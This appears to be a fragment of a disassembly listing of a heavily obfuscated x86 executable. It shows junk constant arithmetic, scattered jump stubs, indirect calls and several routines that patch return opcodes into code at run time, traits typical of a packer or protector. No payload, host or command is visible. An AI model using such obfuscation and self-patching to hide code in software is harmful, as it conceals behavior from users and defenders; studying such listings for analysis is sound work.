loc_44180E:				; CODE XREF: sub_445226:loc_44D55Cj
		call	sub_4460E8

loc_441813:				; CODE XREF: sub_43F5BD+9A5Bj
		jmp	loc_44E88C
; END OF FUNCTION CHUNK	FOR sub_43BE53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_441818:				; CODE XREF: sub_45689F-5240j
		jnz	loc_443A58
		jmp	loc_456A90
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_441823:				; CODE XREF: sub_4599BE-17A65j
		jnz	loc_45B23A
; END OF FUNCTION CHUNK	FOR sub_4599BE
; START	OF FUNCTION CHUNK FOR sub_455A53

loc_441829:				; CODE XREF: sub_455A53+10j
		jmp	loc_447B8C
; END OF FUNCTION CHUNK	FOR sub_455A53
; ---------------------------------------------------------------------------

loc_44182E:				; CODE XREF: y2kk37jd:00444D9Bj
		jmp	locret_448C25
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_441833:				; CODE XREF: sub_43F346+575Cj
		jmp	loc_446474
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
		jns	loc_445992
		cmp	edi, edx
		jmp	loc_45B234
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEAB

loc_441845:				; CODE XREF: y2kk37jd:0043E87Ej
					; sub_44CEAB+5A34j
		inc	dword ptr [ebp-18h]
		dec	dword ptr [ebp-1Ch]
		jnz	loc_455095
		jmp	loc_451C71
; END OF FUNCTION CHUNK	FOR sub_44CEAB

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_441856	proc near		; CODE XREF: sub_43C3F1+Ej
					; sub_4417AF+5p ...

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043BA44 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C3D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044688A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004517A3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455113 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0045824A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459BAF SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF4h
		mov	[ebp+var_4], eax
		jmp	loc_459BAF
sub_441856	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DAE1

loc_441864:				; CODE XREF: sub_44DAE1+6j
		push	offset loc_446F33
		jmp	nullsub_79
; END OF FUNCTION CHUNK	FOR sub_44DAE1
; ---------------------------------------------------------------------------
		mov	dword ptr [ebp-4], 1
		mov	eax, 0
		or	eax, eax
		jz	loc_45C160
		jmp	loc_4501D5
; ---------------------------------------------------------------------------

loc_441887:				; CODE XREF: y2kk37jd:00459CF2j
		jz	loc_453500
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_44188D:				; CODE XREF: sub_4429DD+19475j
		jmp	loc_443FD5
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------

loc_441892:				; CODE XREF: y2kk37jd:0045333Bj
		jmp	nullsub_500
; ---------------------------------------------------------------------------
		adc	edi, ebx
		jmp	loc_44ADFF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4486E1

loc_44189E:				; CODE XREF: sub_4486E1+103E3j
		pop	ecx
		or	ecx, 984125B4h
		sub	ecx, 0F5B6E4CBh
		rol	ecx, 1Bh
		add	ecx, 610259A3h
		popf
		jmp	loc_458D3B
; END OF FUNCTION CHUNK	FOR sub_4486E1

; =============== S U B	R O U T	I N E =======================================



sub_4418BA	proc near		; DATA XREF: y2kk37jd:00459359o

; FUNCTION CHUNK AT 0044756E SIZE 00000005 BYTES

		mov	ds:off_41E070, eax
		lea	eax, loc_443D3C
		mov	byte ptr [eax],	0C3h
		jmp	loc_44756E
sub_4418BA	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_4418CE:				; CODE XREF: sub_44610D:loc_443D3Cj
					; sub_445568:loc_454C9Aj
		pop	edx
		mov	eax, [esp+0]
		push	edx
		call	sub_43F5BD
		jmp	loc_454156
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_4418DD:				; CODE XREF: sub_43ED86+Ej
					; sub_43ED86+3CE7j ...
		jb	loc_45997E
		push	edi
		push	65A2F853h
		pop	edi
		add	edi, 1EDBC5FBh
		sub	edi, 7D320D8Bh
		add	edi, 812CA8B8h
		sub	eax, edi
		jmp	loc_4539B9
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FEFB

loc_441903:				; CODE XREF: sub_43FEFB+8F1Aj
		mov	byte ptr [edi],	87h
		pop	edi
		push	ebx

loc_441908:				; CODE XREF: y2kk37jd:0044294Ej
		push	2BFDEEA2h
		pop	ebx
		or	ebx, 2F265D1h
		sub	ebx, 0FC4C31E5h
		jmp	loc_459E28
; END OF FUNCTION CHUNK	FOR sub_43FEFB
; ---------------------------------------------------------------------------

loc_44191F:				; CODE XREF: y2kk37jd:00456624j
		pop	ebx
		and	ebx, 71A4369h
		rol	ebx, 2
		and	ebx, 9EE46179h
		sub	ebx, 0D1A62C0Fh
		jmp	loc_4577F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_44193A:				; CODE XREF: sub_445568+15CC7j
		or	ebx, 0A61CF357h
		sub	ebp, edi
		and	edx, 29C28D4Bh
		jmp	loc_43CF5D
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
		push	56F395E8h
		jmp	sub_449E69
; ---------------------------------------------------------------------------

loc_441957:				; CODE XREF: y2kk37jd:0044ADCBj
		call	sub_448C11
		call	sub_440D56
; START	OF FUNCTION CHUNK FOR sub_4553C1

loc_441961:				; CODE XREF: sub_4553C1+6j
		jmp	loc_453760
; END OF FUNCTION CHUNK	FOR sub_4553C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442376

loc_441966:				; CODE XREF: sub_442376-5912j
		jmp	sub_4577FE
; END OF FUNCTION CHUNK	FOR sub_442376
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FB21

loc_44196B:				; CODE XREF: sub_44FB21-CC72j
		jl	loc_44B3D6

loc_441971:				; CODE XREF: sub_443BAF+AB25j
		jmp	loc_4599F7
; END OF FUNCTION CHUNK	FOR sub_44FB21
; ---------------------------------------------------------------------------
		xchg	ebp, esi
		jmp	loc_44B3CC
; ---------------------------------------------------------------------------

loc_44197D:				; CODE XREF: y2kk37jd:loc_446AA5j
		jz	loc_43FA23
		jmp	loc_43FDE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_441988:				; CODE XREF: sub_43C851:loc_453C67j
		cmp	esi, ebx
		jmp	loc_43EC6E
; END OF FUNCTION CHUNK	FOR sub_43C851
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_25. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_441990:				; CODE XREF: sub_443BAF+F199j
		jmp	loc_44E6CE
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_441995:				; CODE XREF: sub_43F2F2+34AAj
		jmp	loc_44A144
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446718

loc_44199A:				; CODE XREF: sub_446718:loc_45549Ej
		push	esi
		mov	esi, ebx
		xchg	esi, [esp+4+var_4]
		push	5033322Ch
		xchg	edx, [esp+8+var_8]
		mov	ebx, edx
		pop	edx
		jmp	loc_4448F6
; END OF FUNCTION CHUNK	FOR sub_446718
; ---------------------------------------------------------------------------
		or	edx, 9F97E920h
		jmp	sub_45484D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_410. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570BB

loc_4419BC:				; CODE XREF: sub_4570BB+3j
		jmp	sub_4487FD
; END OF FUNCTION CHUNK	FOR sub_4570BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_4419C1:				; CODE XREF: sub_449C4F:loc_4481C7j
		mov	esi, [esi]
		add	eax, esi
		pop	esi
		xor	edx, edx
		push	edx
		push	eax
		push	815CF4BAh
		jmp	loc_43B20F
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444180

loc_4419D4:				; CODE XREF: sub_444180+10B46j
		rol	ecx, 9
		add	ecx, 0F5B48275h
		mov	ecx, [ecx]
		or	[ecx+edx], al
		push	0A99E6757h
		jmp	loc_442772
; END OF FUNCTION CHUNK	FOR sub_444180
; ---------------------------------------------------------------------------
		and	ebx, 0AD4CBFE8h
		pop	edx
		jmp	sub_44F142
; ---------------------------------------------------------------------------
		call	nullsub_5
		jmp	ds:dword_41E110
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B60B

loc_441A03:				; CODE XREF: sub_45B60B-E2BDj
		jmp	loc_45153B
; END OF FUNCTION CHUNK	FOR sub_45B60B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_441A08:				; CODE XREF: sub_445226+2EE7j
		jmp	sub_44E5E5
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E19

loc_441A0D:				; CODE XREF: sub_446E19+804j
		jmp	loc_447BFC
; END OF FUNCTION CHUNK	FOR sub_446E19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_441A12:				; CODE XREF: sub_45C5CF-1C398j
					; sub_4599BE-8430j
		jmp	loc_4485D5
; END OF FUNCTION CHUNK	FOR sub_4599BE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_5. PRESS KEYPAD "+" TO EXPAND]
		dd 1A7B081h, 48B5A00h, 0D0DDE924h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E25A

loc_441A26:				; CODE XREF: sub_43E25A:loc_45289Dj
		push	1CF92597h
		not	eax
		jmp	loc_45C363
; END OF FUNCTION CHUNK	FOR sub_43E25A
; ---------------------------------------------------------------------------

loc_441A32:				; DATA XREF: y2kk37jd:loc_43D2E2o
		mov	eax, 0B0h
		call	sub_454413
		jmp	loc_44F16C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_441A41:				; CODE XREF: y2kk37jd:00441A62j
					; sub_4507BF-EBF6j ...
		push	offset loc_45839F
		jmp	loc_43B690
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------

loc_441A4B:				; CODE XREF: y2kk37jd:00458E79j
		jnz	loc_4537A7

loc_441A51:				; CODE XREF: y2kk37jd:0043CB2Cj
		sbb	eax, edx
		jmp	loc_4479B2
; ---------------------------------------------------------------------------

loc_441A58:				; DATA XREF: sub_4507BF:loc_451E48o
		cmp	dword ptr [ebp-108h], 31342D37h
		jnz	loc_441A41
		jmp	loc_4591E1
; ---------------------------------------------------------------------------

loc_441A6D:				; CODE XREF: y2kk37jd:0044E779j
		mov	edi, ecx
		sub	eax, 68E877E6h

loc_441A75:				; CODE XREF: y2kk37jd:loc_44E762j
		and	edi, 6D4F9B1Eh
		add	edi, 0C980B96Dh
		xor	edi, 59C5AA6h
		jmp	loc_44C333
; ---------------------------------------------------------------------------

loc_441A8C:				; CODE XREF: y2kk37jd:loc_451BFAj
		push	offset loc_459583
		jmp	loc_451F11
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_441A96:				; CODE XREF: sub_454413-D198j
		pushf
		and	eax, 3C3FB52Fh

loc_441A9D:				; CODE XREF: sub_454413:loc_4430BAj
		mov	eax, [ebp-4]
		call	nullsub_12
		retn
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A298

loc_441AA6:				; CODE XREF: sub_44A298+1046Dj
		jmp	loc_45C719
; END OF FUNCTION CHUNK	FOR sub_44A298

; =============== S U B	R O U T	I N E =======================================



sub_441AAB	proc near		; CODE XREF: sub_452C88-804Fj

; FUNCTION CHUNK AT 0043B741 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043F7D5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442EED SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00442F3D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F807 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00457DBB SIZE 00000012 BYTES

		push	ebx
		push	0AE17EB3Ch
		pop	ebx
		sub	ebx, 9B88C0Dh
		call	sub_44B51A

loc_441ABD:				; CODE XREF: y2kk37jd:00451612j
		jmp	loc_442EED
sub_441AAB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_441AC2:				; CODE XREF: sub_43F75D+7C6Bj
		jmp	loc_44AA85
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E679

loc_441AC7:				; CODE XREF: sub_43E679:loc_4495BDj
		jz	loc_44F53D
		jmp	loc_44535D
; END OF FUNCTION CHUNK	FOR sub_43E679
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_441AD2:				; CODE XREF: sub_43F75D-41D2j
					; sub_445226:loc_43D149j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4440D1
		jmp	loc_44CD62
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
		jmp	ds:off_41E06C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E389

loc_441AE9:				; CODE XREF: sub_43E389+F56Dj
		jmp	loc_449023
; END OF FUNCTION CHUNK	FOR sub_43E389
; ---------------------------------------------------------------------------

loc_441AEE:				; CODE XREF: y2kk37jd:00448FA9j
		jmp	loc_4529F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E707

loc_441AF3:				; CODE XREF: sub_43E707+11A70j
					; sub_446FEB:loc_459E0Fj ...
		pop	edx
		jns	loc_45017C
		mov	eax, [esp-8+arg_4]
		push	ecx
		mov	ecx, edx
		call	sub_43E707

loc_441B05:				; CODE XREF: sub_4526A0-8DDj
		jmp	nullsub_97
; END OF FUNCTION CHUNK	FOR sub_43E707
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452C88

loc_441B0A:				; CODE XREF: sub_452C88:loc_4546B6j
		test	edi, 800000h
		jmp	loc_45A70A
; END OF FUNCTION CHUNK	FOR sub_452C88
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_441B15:				; CODE XREF: sub_445226+A508j
		push	0BE7B9E92h
		cdq
		cmp	ecx, esi
		jmp	loc_45836D
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_441B22:				; CODE XREF: sub_44C304-A4AEj
		jnz	loc_44BC2C

loc_441B28:				; CODE XREF: sub_445226:loc_446B62j
		jmp	loc_45A525
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF09

loc_441B2D:				; CODE XREF: sub_44CF09-E3B2j
		jmp	loc_44C780
; END OF FUNCTION CHUNK	FOR sub_44CF09
; ---------------------------------------------------------------------------
		add	edi, ebx
		test	esi, ecx
		jmp	loc_44BC26
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_441B3B:				; CODE XREF: sub_44610D:loc_4494A8j
		jnz	loc_44332C
		mov	[esi], edi
		jmp	loc_453231
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------

loc_441B48:				; CODE XREF: y2kk37jd:loc_4431BEj
		xor	edx, 6F25E10Ch
		test	edx, 2
		jmp	loc_454B60
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_511. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_441B5A:				; CODE XREF: sub_453867-CA04j
		jmp	loc_43F2DF
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_441B5F:				; CODE XREF: y2kk37jd:loc_451D9Cj
		mov	esi, ebp
		xchg	esi, [esp]
		mov	ebp, esp
		push	ebx
		push	eax
		push	ecx
		call	sub_459672
; START	OF FUNCTION CHUNK FOR sub_451464

loc_441B6E:				; CODE XREF: sub_451464-CD95j
					; y2kk37jd:00450DF4j
		jmp	loc_43B343
; END OF FUNCTION CHUNK	FOR sub_451464
; ---------------------------------------------------------------------------
		mov	ds:off_41E0B4, eax
		lea	eax, sub_446B6E
		mov	byte ptr [eax],	0C3h
		jmp	sub_446B6E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B6E

loc_441B87:				; CODE XREF: sub_446B6E+1j
		mov	eax, [esp+0]
		push	ebx
		jmp	loc_440882
; END OF FUNCTION CHUNK	FOR sub_446B6E
; ---------------------------------------------------------------------------

locret_441B90:				; CODE XREF: y2kk37jd:loc_43F9EBj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_441B91:				; CODE XREF: sub_43ED19+1D42Ej
		jmp	loc_440DFD
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DE8B

loc_441B96:				; CODE XREF: sub_43DE8B+156E8j
		adc	ecx, edx
		xchg	esi, [ebp+0]
		jnb	sub_45BF5E
		test	edi, eax
		jmp	loc_455FEA
; END OF FUNCTION CHUNK	FOR sub_43DE8B
; ---------------------------------------------------------------------------

loc_441BA8:				; CODE XREF: y2kk37jd:0043D3D7j
		pop	ebp
		xchg	ebp, [esp]
		push	ecx
		push	eax
		push	ebx
		jmp	loc_44946B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B765

loc_441BB4:				; CODE XREF: sub_43B765:loc_440810j
		jz	loc_452CCA
		jmp	loc_44048E
; END OF FUNCTION CHUNK	FOR sub_43B765
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_441BBF:				; CODE XREF: sub_4507BF:loc_43E844j
					; sub_4507BF+36ACj
		cmp	dword ptr [ebp-108h], 31342D37h
		jnz	loc_441A41
		jmp	loc_4470C8
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
		mov	eax, 0A4C05BA6h
		call	sub_442C3E
		mov	ds:dword_41E180, eax
		lea	eax, nullsub_2
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_2
; ---------------------------------------------------------------------------
		pop	edx
		jmp	loc_43B10C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F3F5

loc_441BF8:				; CODE XREF: sub_44F3F5+6EC3j
		jg	loc_44B864
		mov	[esi], edx
		jno	loc_43B81F

loc_441C06:				; CODE XREF: sub_44F3F5:loc_44A673j
		sub	esi, 7B32CDA2h
		xor	esi, 86BFA841h
		add	esi, 83E56B1Eh
		jmp	loc_43DD06
; END OF FUNCTION CHUNK	FOR sub_44F3F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4480CB

loc_441C1D:				; CODE XREF: sub_4480CB-1922j
		or	eax, 9FCCD882h
		xor	eax, 590138AEh
		sub	eax, 105686E9h
		call	sub_4496C2

loc_441C34:				; CODE XREF: sub_450F0B:loc_444631j
		mov	ecx, [ebx+edx-8]
		or	ecx, ecx
		jz	loc_444FA4
		call	sub_43CB82
		jnz	loc_451AA2
		mov	ecx, [ebx+edx-4]
		jmp	loc_44A923
; END OF FUNCTION CHUNK	FOR sub_4480CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_441C54:				; CODE XREF: sub_445226:loc_4424C0j
		ror	eax, 0Fh
		push	esi
; END OF FUNCTION CHUNK	FOR sub_445226
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_441C58:				; CODE XREF: sub_442A84:loc_44008Aj
					; y2kk37jd:004501A0j
		push	0CD0642D5h
		pop	esi

loc_441C5E:				; CODE XREF: y2kk37jd:loc_43C5AEj
		sub	esi, 18BF75F6h
		rol	esi, 0Bh
		or	esi, 0E3B72F58h
		add	esi, 84C584Ah
		jmp	loc_44DD5D
; END OF FUNCTION CHUNK	FOR sub_442A84

; =============== S U B	R O U T	I N E =======================================



sub_441C78	proc near		; CODE XREF: sub_45A40E-403p
					; y2kk37jd:0045B526j

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0044DEEF SIZE 00000011 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	ecx, [esp-4+arg_0]
		mov	edi, ecx
		pop	ecx
		xor	edi, 0B836221Ch
		and	edi, ds:4000EBh
		jmp	loc_44DEEF
sub_441C78	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443360

loc_441C93:				; CODE XREF: sub_443360+A9D6j
		push	ecx
		xchg	edx, [eax]
		jmp	loc_458A05
; END OF FUNCTION CHUNK	FOR sub_443360
; ---------------------------------------------------------------------------

loc_441C9B:				; DATA XREF: sub_45A7F7+1o
		push	edx
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp]
		and	edx, ecx
		adc	edx, 0CD7FAFB4h

loc_441CAA:				; CODE XREF: y2kk37jd:loc_452853j
		push	edi
		jmp	loc_44E504
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_456BF7
		jmp	loc_444C26
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_441CBD:				; CODE XREF: sub_4411C3+17C5Fj
					; y2kk37jd:00458E32j
		sub	edx, 2D6D79E1h
		test	edx, 80000000h
		jmp	loc_4440BA
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4443CD

loc_441CCE:				; CODE XREF: sub_4443CD:loc_43B899j
		push	4E8E4D4Dh
		pop	esi
		and	esi, 1F953076h
		add	esi, 0F1C01CA4h
		xchg	esi, [esp+0]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_4443CD
; ---------------------------------------------------------------------------
		mov	ds:off_41E090, eax
		jmp	loc_43FCC2
; ---------------------------------------------------------------------------

loc_441CF3:				; CODE XREF: y2kk37jd:0044CDD0j
		jle	loc_452348
		jl	loc_451FDA
		cmp	edx, 8D3C4BA3h
		jmp	loc_452426
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E20

loc_441D0A:				; CODE XREF: sub_454E20:loc_44CA7Cj
		cmp	byte ptr [ebp-5], 0
		jnz	loc_43B9A3
		jmp	loc_440605
; END OF FUNCTION CHUNK	FOR sub_454E20
; ---------------------------------------------------------------------------

loc_441D19:				; CODE XREF: y2kk37jd:00447D9Fj
		adc	ebx, edx

; =============== S U B	R O U T	I N E =======================================



sub_441D1B	proc near		; CODE XREF: y2kk37jd:loc_43DD70p
		xchg	edi, [esp+0]
		pop	edi
		xor	eax, 0C84ECE0Bh
		jmp	loc_45AFF3
sub_441D1B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_441D2A:				; CODE XREF: y2kk37jd:loc_44639Cj
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44D331
		jmp	loc_44E788
; ---------------------------------------------------------------------------

loc_441D39:				; DATA XREF: sub_43ED19+486Eo
		xor	eax, 9684FBC1h
		add	eax, ebp
		push	edi
		push	81163A82h
		pop	edi
		sub	edi, 83886782h
		and	edi, 0C946872h
		jmp	loc_44B095
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD78

loc_441D59:				; CODE XREF: sub_43BD78+1DFB5j
		and	ecx, 8EA031DEh
		call	sub_44E7AF
; END OF FUNCTION CHUNK	FOR sub_43BD78
; START	OF FUNCTION CHUNK FOR sub_4432FD

loc_441D64:				; CODE XREF: sub_4432FD+B171j
		jmp	loc_44D256
; END OF FUNCTION CHUNK	FOR sub_4432FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FB21

loc_441D69:				; CODE XREF: sub_44FB21-1911j
		jmp	loc_442E9C
; END OF FUNCTION CHUNK	FOR sub_44FB21
; ---------------------------------------------------------------------------

loc_441D6E:				; CODE XREF: y2kk37jd:0044C384j
		jmp	loc_44D845
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45380A

loc_441D73:				; CODE XREF: sub_45380A-A456j
					; sub_45380A:loc_44CEC6j
		push	offset loc_44928D
		jmp	nullsub_248
; END OF FUNCTION CHUNK	FOR sub_45380A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4526A0

loc_441D7D:				; CODE XREF: sub_4526A0-DE45j
		mov	ds:off_41E158, eax
		lea	eax, sub_4526A0
		mov	byte ptr [eax],	0C3h
		jmp	loc_447569
; END OF FUNCTION CHUNK	FOR sub_4526A0
; ---------------------------------------------------------------------------
		call	nullsub_456
		jmp	ds:dword_41E15C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440FDF

loc_441D9C:				; CODE XREF: sub_440FDF-1538j
		jmp	loc_44E92D
; END OF FUNCTION CHUNK	FOR sub_440FDF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_456. PRESS KEYPAD	"+" TO EXPAND]
		dw 7182h
		dd 5A00014Ch, 0FF965FE9h, 0F12668FFh, 815A940Dh, 0B08299F2h
		dd 16C2C1D7h, 1865EE9h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454539

loc_441DC1:				; CODE XREF: sub_454539+5C37j
		mov	eax, ds:dword_446BAC
		or	eax, eax
		jnz	loc_43DBED
		jmp	loc_45953B
; END OF FUNCTION CHUNK	FOR sub_454539

; =============== S U B	R O U T	I N E =======================================



sub_441DD4	proc near		; CODE XREF: y2kk37jd:00440A5Bj
					; sub_44CB8B+71A4p

; FUNCTION CHUNK AT 004565C1 SIZE 00000013 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	esi
		mov	esi, edx
		jmp	loc_4565C1
sub_441DD4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454DDC

loc_441DE0:				; CODE XREF: sub_454DDC:loc_454DE4j
		and	eax, 9DF81890h
		mov	ecx, [edi]
		jmp	loc_448C6B
; END OF FUNCTION CHUNK	FOR sub_454DDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453A10

loc_441DED:				; CODE XREF: sub_453A10:loc_44B36Aj
		add	edx, 9F42042Ch
		or	edx, ds:4000F2h
		sub	edx, 9408CC52h
		add	edx, 0DF552BF5h
		add	edx, ebp
		add	edx, 0BD3FA4BAh
		mov	edx, [edx]
		jmp	loc_45C5C0
; END OF FUNCTION CHUNK	FOR sub_453A10

; =============== S U B	R O U T	I N E =======================================



sub_441E14	proc near		; CODE XREF: sub_459444j
					; DATA XREF: sub_43B0F5:loc_45943Ao

; FUNCTION CHUNK AT 004451FD SIZE 00000005 BYTES

		call	sub_442C3E
		mov	ds:dword_41E194, eax
		lea	eax, nullsub_277
		mov	byte ptr [eax],	0C3h
		jmp	loc_4451FD
sub_441E14	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504DD

loc_441E2D:				; CODE XREF: sub_4504DD:loc_4424ABj
		lea	eax, loc_457B27
		mov	byte ptr [eax],	0C3h
		jmp	loc_457B27
; END OF FUNCTION CHUNK	FOR sub_4504DD
; ---------------------------------------------------------------------------
		push	eax
		push	0B21B1AE6h
		xchg	esi, [esp]

loc_441E44:				; CODE XREF: y2kk37jd:loc_457274j
		jmp	loc_450C49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_441E49:				; CODE XREF: sub_44C304:loc_4516ECj
		pop	eax
		sub	eax, 0FFEDF96Ch
		test	eax, 1
		jmp	loc_441B22
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E16

loc_441E5B:				; CODE XREF: sub_443E16+Bj
		call	sub_451722
; END OF FUNCTION CHUNK	FOR sub_443E16
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_265. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_441E61:				; CODE XREF: y2kk37jd:004457D2j
		jmp	sub_45405E
; ---------------------------------------------------------------------------

loc_441E66:				; DATA XREF: sub_45B02F+5o
		mov	ds:dword_41E0C8, eax
		lea	eax, nullsub_202
		mov	byte ptr [eax],	0C3h
		jmp	loc_4531D6
